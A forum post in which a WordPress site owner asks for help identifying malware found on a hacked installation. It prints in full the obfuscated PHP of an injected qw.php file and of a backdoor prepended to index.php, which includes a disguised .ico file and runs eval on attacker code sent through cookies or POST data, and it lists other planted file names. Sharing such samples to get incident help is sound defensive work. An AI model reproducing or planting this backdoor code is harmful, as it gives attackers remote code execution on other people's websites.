WordPress qw.php file on root of installation

I’m posting here not only to receive help or guidance on this particular file, but also to help in searching for this issue.

Apparently, the root of the installation for WordPress has a file called qw.php that is not part of the standard installation package.

The file contents are as follows:

<?php

$alphabet  =  ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string  = "Z2xvYmFsICRhdXRoX3Bhc3MsJGNvbG9yLCRkZWZhdWx0X2FjdGlvbiwkZGVmYXVsdF91$"
$array_name  =  "";
$ar  = array(4,29,34,38,42,9,21,7,38,17,37,7,38);

foreach($ar as $t){
   $array_name .= $alphabet[$t];
}

$a  =  strrev("noi"."tcnuf"."_eta"."erc");
$f  =  $a("", $array_name($string));
$f();

I’ve noticed the hacker will also go into an index.php file of a folder or installation, and add the following php to the top of the php file:

    <?php
/*e5486*/

@include "\057www\055dat\141/AN\110_US\101/pe\164iti\157nhe\162o.o\162g/w\145b/c\157nte\156t/.\066a99\07094c\056ico";

/*e5486*/                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $tc6d63f = 643;$GLOBALS['r15a0'] = Array();global $r15a0;$r15a0 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['fd7e1'] = "\x63\x4a\x52\x51\x67\x5b\x46\x41\x38\x60\x50\x65\x3e\x7b\x54\x64\x2e\x71\x2a\x75\x56\x7e\x66\x2f\x59\x3d\x6c\x76\x79\x22\x58\x37\x6f\x7a\x3b\x68\x70\x42\x6b\x49\x28\x21\x47\x23\x74\x9\x5f\x77\x4c\x6d\x24\x53\x34\x4b\x45\xd\xa\x44\x2d\x31\x61\x5a\x40\x29\x43\x6e\x57\x3a\x72\x36\x4f\x39\x62\x35\x3f\x7d\x4d\x5c\x73\x69\x26\x5e\x2b\x4e\x48\x6a\x30\x2c\x78\x33\x27\x5d\x7c\x32\x55\x20\x3c\x25";$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][22].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22].$r15a0['fd7e1'][71].$r15a0['fd7e1'][73].$r15a0['fd7e1'][0]] = $r15a0['fd7e1'][0].$r15a0['fd7e1'][35].$r15a0['fd7e1'][68];$r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]] = $r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][31].$r15a0['fd7e1'][31].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72]] = $r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][22].$r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][44].$r15a0['fd7e1'][68].$r15a0['fd7e1'][26].$r15a0['fd7e1'][11].$r15a0['fd7e1'][65];$r15a0[$r15a0['fd7e1'][17].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][93].$r15a0['fd7e1'][73]] = $r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][22].$r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][11].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]] = $r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][79].$r15a0['fd7e1'][46].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][44];$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][89].$r15a0['fd7e1'][52].$r15a0['fd7e1'][8]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][79].$r15a0['fd7e1'][60].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][33].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][49].$r15a0['fd7e1'][52].$r15a0['fd7e1'][31].$r15a0['fd7e1'][15].$r15a0['fd7e1'][89].$r15a0['fd7e1'][72].$r15a0['fd7e1'][15]] = $r15a0['fd7e1'][36].$r15a0['fd7e1'][35].$r15a0['fd7e1'][36].$r15a0['fd7e1'][27].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][78].$r15a0['fd7e1'][79].$r15a0['fd7e1'][32].$r15a0['fd7e1'][65];$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][8].$r15a0['fd7e1'][69].$r15a0['fd7e1'][11].$r15a0['fd7e1'][89].$r15a0['fd7e1'][71].$r15a0['fd7e1'][71].$r15a0['fd7e1'][31].$r15a0['fd7e1'][93]] = $r15a0['fd7e1'][19].$r15a0['fd7e1'][65].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][79].$r15a0['fd7e1'][60].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][33].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][52].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][0].$r15a0['fd7e1'][8].$r15a0['fd7e1'][89].$r15a0['fd7e1'][31]] = $r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][69].$r15a0['fd7e1'][52].$r15a0['fd7e1'][46].$r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][0].$r15a0['fd7e1'][32].$r15a0['fd7e1'][15].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][72].$r15a0['fd7e1'][72].$r15a0['fd7e1'][73]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][44].$r15a0['fd7e1'][46].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][11].$r15a0['fd7e1'][46].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][79].$r15a0['fd7e1'][44];$r15a0[$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][73].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][15]] = $r15a0['fd7e1'][68].$r15a0['fd7e1'][52].$r15a0['fd7e1'][22].$r15a0['fd7e1'][0].$r15a0['fd7e1'][11].$r15a0['fd7e1'][86].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]] = $r15a0['fd7e1'][44].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72].$r15a0['fd7e1'][89].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][32].$r15a0['fd7e1'][93].$r15a0['fd7e1'][86].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8]] = $_POST;$r15a0[$r15a0['fd7e1'][26].$r15a0['fd7e1'][71].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][0]] = $_COOKIE;@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][68].$r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][46].$r15a0['fd7e1'][26].$r15a0['fd7e1'][32].$r15a0['fd7e1'][4], NULL);@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][26].$r15a0['fd7e1'][32].$r15a0['fd7e1'][4].$r15a0['fd7e1'][46].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][68].$r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][78], 0);@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][49].$r15a0['fd7e1'][60].$r15a0['fd7e1'][88].$r15a0['fd7e1'][46].$r15a0['fd7e1'][11].$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][0].$r15a0['fd7e1'][19].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][32].$r15a0['fd7e1'][65].$r15a0['fd7e1'][46].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][11], 0);@$r15a0[$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][72].$r15a0['fd7e1'][72].$r15a0['fd7e1'][73]](0);if (!$r15a0[$r15a0['fd7e1'][17].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][93].$r15a0['fd7e1'][73]]($r15a0['fd7e1'][7].$r15a0['fd7e1'][48].$r15a0['fd7e1'][2].$r15a0['fd7e1'][54].$r15a0['fd7e1'][7].$r15a0['fd7e1'][57].$r15a0['fd7e1'][24].$r15a0['fd7e1'][46].$r15a0['fd7e1'][2].$r15a0['fd7e1'][94].$r15a0['fd7e1'][83].$r15a0['fd7e1'][46].$r15a0['fd7e1'][89].$r15a0['fd7e1'][69].$r15a0['fd7e1'][69].$r15a0['fd7e1'][60].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][93].$r15a0['fd7e1'][89].$r15a0['fd7e1'][73].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][59].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][22].$r15a0['fd7e1'][59].$r15a0['fd7e1'][59].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][59].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60])){$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][31].$r15a0['fd7e1'][31].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72]]($r15a0['fd7e1'][7].$r15a0['fd7e1'][48].$r15a0['fd7e1'][2].$r15a0['fd7e1'][54].$r15a0['fd7e1'][7].$r15a0['fd7e1'][57].$r15a0['fd7e1'][24].$r15a0['fd7e1'][46].$r15a0['fd7e1'][2].$r15a0['fd7e1'][94].$r15a0['fd7e1'][83].$r15a0['fd7e1'][46].$r15a0['fd7e1'][89].$r15a0['fd7e1'][69].$r15a0['fd7e1'][69].$r15a0['fd7e1'][60].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][93].$r15a0['fd7e1'][89].$r15a0['fd7e1'][73].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][59].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][22].$r15a0['fd7e1'][59].$r15a0['fd7e1'][59].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][59].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60], 1);$fd2e3658 = NULL;$l055f1e = NULL;$r15a0[$r15a0['fd7e1'][78].$r15a0['fd7e1'][31].$r15a0['fd7e1'][59].$r15a0['fd7e1'][93].$r15a0['fd7e1'][0].$r15a0['fd7e1'][52]] = $r15a0['fd7e1'][73].$r15a0['fd7e1'][52].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][58].$r15a0['fd7e1'][52].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][22].$r15a0['fd7e1'][58].$r15a0['fd7e1'][52].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][58].$r15a0['fd7e1'][8].$r15a0['fd7e1'][73].$r15a0['fd7e1'][8].$r15a0['fd7e1'][22].$r15a0['fd7e1'][58].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][69].$r15a0['fd7e1'][0].$r15a0['fd7e1'][31].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][59].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22];global $s712c4;function  t4b3d($fd2e3658, $h0025d){global $r15a0;$abe6301 = "";for ($x3b1d62=0; $x3b1d62<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($fd2e3658);){for ($pb0b59=0; $pb0b59<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($h0025d) && $x3b1d62<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($fd2e3658); $pb0b59++, $x3b1d62++){$abe6301 .= $r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][22].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22].$r15a0['fd7e1'][71].$r15a0['fd7e1'][73].$r15a0['fd7e1'][0]]($r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]]($fd2e3658[$x3b1d62]) ^ $r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]]($h0025d[$pb0b59]));}}return $abe6301;}function  r4fce08d($fd2e3658, $h0025d){global $r15a0;global $s712c4;return $r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]]($r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]]($fd2e3658, $s712c4), $h0025d);}foreach ($r15a0[$r15a0['fd7e1'][26].$r15a0['fd7e1'][71].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][0]] as $h0025d=>$n9121){$fd2e3658 = $n9121;$l055f1e = $h0025d;}if (!$fd2e3658){foreach ($r15a0[$r15a0['fd7e1'][32].$r15a0['fd7e1'][93].$r15a0['fd7e1'][86].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8]] as $h0025d=>$n9121){$fd2e3658 = $n9121;$l055f1e = $h0025d;}}$fd2e3658 = @$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][8].$r15a0['fd7e1'][69].$r15a0['fd7e1'][11].$r15a0['fd7e1'][89].$r15a0['fd7e1'][71].$r15a0['fd7e1'][71].$r15a0['fd7e1'][31].$r15a0['fd7e1'][93]]($r15a0[$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][73].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][15]]($r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][52].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][0].$r15a0['fd7e1'][8].$r15a0['fd7e1'][89].$r15a0['fd7e1'][31]]($fd2e3658), $l055f1e));if (isset($fd2e3658[$r15a0['fd7e1'][60].$r15a0['fd7e1'][38]]) && $s712c4==$fd2e3658[$r15a0['fd7e1'][60].$r15a0['fd7e1'][38]]){if ($fd2e3658[$r15a0['fd7e1'][60]] == $r15a0['fd7e1'][79]){$x3b1d62 = Array($r15a0['fd7e1'][36].$r15a0['fd7e1'][27] => @$r15a0[$r15a0['fd7e1'][49].$r15a0['fd7e1'][52].$r15a0['fd7e1'][31].$r15a0['fd7e1'][15].$r15a0['fd7e1'][89].$r15a0['fd7e1'][72].$r15a0['fd7e1'][15]](),$r15a0['fd7e1'][78].$r15a0['fd7e1'][27] => $r15a0['fd7e1'][59].$r15a0['fd7e1'][16].$r15a0['fd7e1'][86].$r15a0['fd7e1'][58].$r15a0['fd7e1'][59],);echo @$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][89].$r15a0['fd7e1'][52].$r15a0['fd7e1'][8]]($x3b1d62);}elseif ($fd2e3658[$r15a0['fd7e1'][60]] == $r15a0['fd7e1'][11]){eval/*k59bce*/($fd2e3658[$r15a0['fd7e1'][15]]);}exit();}} ?>

Additional files added to the server installation root: article59.php, dir44.php, onxwylrq.php

Any thoughts on what this is related to in terms of malware? Does anyone know what this file connects to in terms of a hacked plugin or theme location?